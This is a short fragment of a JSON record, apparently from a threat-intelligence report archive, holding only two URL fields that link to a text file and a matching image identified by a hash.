		"text": "https://archive.orkl.eu/395e66c042c24d580e10e4a8713b3361b7bd32b9.txt",
		"img": "https://archive.orkl.eu/395e66c042c24d580e10e4a8713b3361b7bd32b9.jpg"
	}
}